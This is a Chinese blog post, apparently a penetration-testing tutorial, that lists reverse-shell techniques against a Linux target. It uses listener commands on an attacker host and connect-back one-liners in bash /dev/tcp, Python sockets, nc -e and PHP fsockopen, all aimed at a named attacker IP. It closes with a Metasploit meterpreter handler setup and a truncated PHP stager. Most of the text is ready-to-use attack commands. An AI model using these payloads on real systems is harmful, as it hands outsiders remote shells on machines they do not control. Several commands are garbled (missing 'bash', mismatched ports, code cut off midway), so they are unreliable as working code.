发布于2022年11月4日3年前 在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境攻击机:Kali Linux :47.98.229.211受害机:Centos 7 :149.129.68.117(阿里云服务器)姿势一也是最常见的一种方式Kali监听nc -lvvp 4444centos运行 -i >& /dev/tcp/47.98.229.211/5555 0>&1执行命令后,成功得到反弹!姿势二 python攻击机Kali还是监听nc -lvvp 5555centos执行python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/ ","-i"]);'姿势三 nc如果目标机器上有nc并且存在-e参数,那么可以建立一个反向shell攻击机监听nc -lvvp 5555目标机器执行nc 47.98.229.211 5555 -t -e /bin/ 这样会把目标机的/bin/ 反弹给攻击机但是很多Linux的nc很多都是阉割版的,如果目标机器没有nc或者没有-e选项的话,不建议使用nc的方式姿势四 php攻击机监听nc -lvvp 4444要求目标机器有php然后执行php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");' 其他的一些高能操作 关于PHP的payload现在msfconsole中进行简单的配置msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107PHP<? php error_reporting(0); $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) { {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s > 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/1361.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见